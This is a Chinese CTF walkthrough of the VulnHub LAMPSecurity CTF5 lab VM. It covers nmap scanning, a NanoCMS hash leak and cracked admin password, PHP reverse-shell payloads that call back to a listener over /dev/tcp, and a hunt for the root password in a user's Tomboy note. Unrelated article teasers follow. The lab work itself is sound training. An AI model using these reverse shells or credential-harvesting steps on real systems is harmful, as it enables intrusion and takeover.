vulnhub - LAMPSECURITY: CTF5

news/2024/10/5 15:27:50

vulnhub - LAMPSECURITY: CTF5

信息收集

端口扫描

nmap -sT --min-rate 10000 -p- 192.168.157.164

image-20240614164002842

详细扫描

sudo nmap -sT -sC -sV -O -p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

image-20240614164538787

漏洞探测

sudo nmap --script=vuln p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

给出来很多信息,一会可以都尝试尝试

image-20240614211412967

web渗透

先翻一翻网页

image-20240614205802829

注意到blog页面提到了NanoCMS

image-20240614205845553

搜到了一个RCE,但是需要登入账户

image-20240614210612471

搜了一下发现还有一个密码哈希信息泄露漏洞

image-20240614210756392

访问了一下还真有,泄露了admin的密码

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

image-20240614211030055

成功获得密码shannon

可以登录,但是网页加载缓慢

image-20240614212237532

这里不知道什么缘故我的本地浏览器一直登不上,kali内的浏览器可以

找到代码执行位置反弹shell

<?php system("bash -i > /dev/tcp/192.168.157.161/7777 0>&1");?> 
或
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.157.161/7777 0>&1'"); ?>

image-20240614214848233

保存后回到blog首页点击home触发

image-20240614214918557

这里也能看出两种shell的区别

提权

cat /etc/passwd

主要关注以下用户

patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

搜索记录

grep -R -i pass /home/* 2>/dev/null

image-20240615130227773

查看可疑文件

bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy"><title>Root password</title><text xml:space="preserve"><note-content version="0.1">Root passwordRoot password50$cent</note-content></text><last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date><create-date>2012-12-05T07:24:34.3731780-05:00</create-date><cursor-position>15</cursor-position><width>450</width><height>360</height><x>0</x><y>0</y><open-on-startup>False</open-on-startup>
</note>

50$cent应该就是root的密码,提升为tty后登入root

python -c "import pty;pty.spawn('/bin/sh')"

image-20240615131328259

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/43969.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

安卓签名文件打包错误 Invalid keystore format

1.错误java.io.IOException:Invalid keystore format ...2. 解决方案方案1:找到debug.keystore并删除 路径 User\用户名\android\debug.keystore 删除后重新运行项目,会自动的在生成一个文件。方案2:检查keystore文件是否错误1:找到JdK位置2.进入bin路径下找到keytool工具把…

PDF标准详解(三)—— PDF坐标系统和坐标变换

之前我们了解了PDF文档的基本结构,并且展示了一个简单的hello world。这个hello world 虽然只在页面中显示一个hello world 文字,但是包含的内容却是不少。这次我们仍然以它为切入点,来了解PDF的坐标系统以及坐标变换的相关知识 图形学中二维图形变换 中学我们学习了平面直角…

AssetBundle上层框架

项目地址: YuanJinSen/Demo: Ghost Runner (github.com) 原因 Unity自带的AssetBundle拥有一个巨大的缺点: 比方说我只想要物体A,但A存在于一个巨大的AB包内,想加载A就必须下载一堆无关的东西。 因此有了该上层框架,可以做到,像Resource那样去加载物体,我只加载A。 加载…

生产环境Nginx服务器双机热备部署以及配置内网域名转发

10.0.0.8和10.0.0.9部署nginx: 第一步:上传安装包 第二步:安装编译依赖(使用普通用户需要家sudo) yum install gcc gcc-c++ yum install zlib zlib-devel yum install pcre pcre-devel yum install openssl libssl-dev第三步:解压,编译安装: 解压命令: sudo tar -zxvf…

Java-云原生优化指南-早期发布--全-

Java 云原生优化指南(早期发布)(全)原文:zh.annas-archive.org/md5/df95e958a0ce92b3b5aecdf89067205b 译者:飞龙 协议:CC BY-NC-SA 4.0第一章:优化与性能定义 优化 Java(或任何其他类型的代码)的性能通常被视为黑魔法。关于性能分析有一种神秘感——它通常被视为一种…

计算机视觉会议

计算机视觉会议(CVPR,ECCV,ICCV,NIPS,AAAI,ICLR) 首先介绍的是三大顶会之一的CVPR,全称IEEE Conference on Computer Vision and Pattern Recognition,即IEEE国际计算机视觉与模式识别会议。该会议一般在6月举行,举办地是美国,是一年一次的会议。(电气与电子工程师…

jmeter中beanshell处理器

Jmeter工具中存在BeanShell 取样器,BeanShell预处理程序,BeanShell后置处理程序,那么这次详细整理下BeanShell 在 JMeter 的作用以及案例。 beanshell是什么: BeanShell是一个小型嵌入式Java源代码解释器,能够动态地执行java代码,不需要提前编译 JMeter在它的BeanShell中…

[BUUCTF_Misc]文件中的秘密

题目地址:BUUCTF文件中的秘密 主要工具:edge浏览器,HxD Hex Editor或其他十六进制编辑器下载安装包并解压,发现是一张开朗的路飞表面上什么都看不到,遂十六进制大法,搜索flag。 一无所获。 秘密藏在文件中?搜索secret。 颗粒无收。 大怒,快速上下滑动鼠标滚轮试图将答案…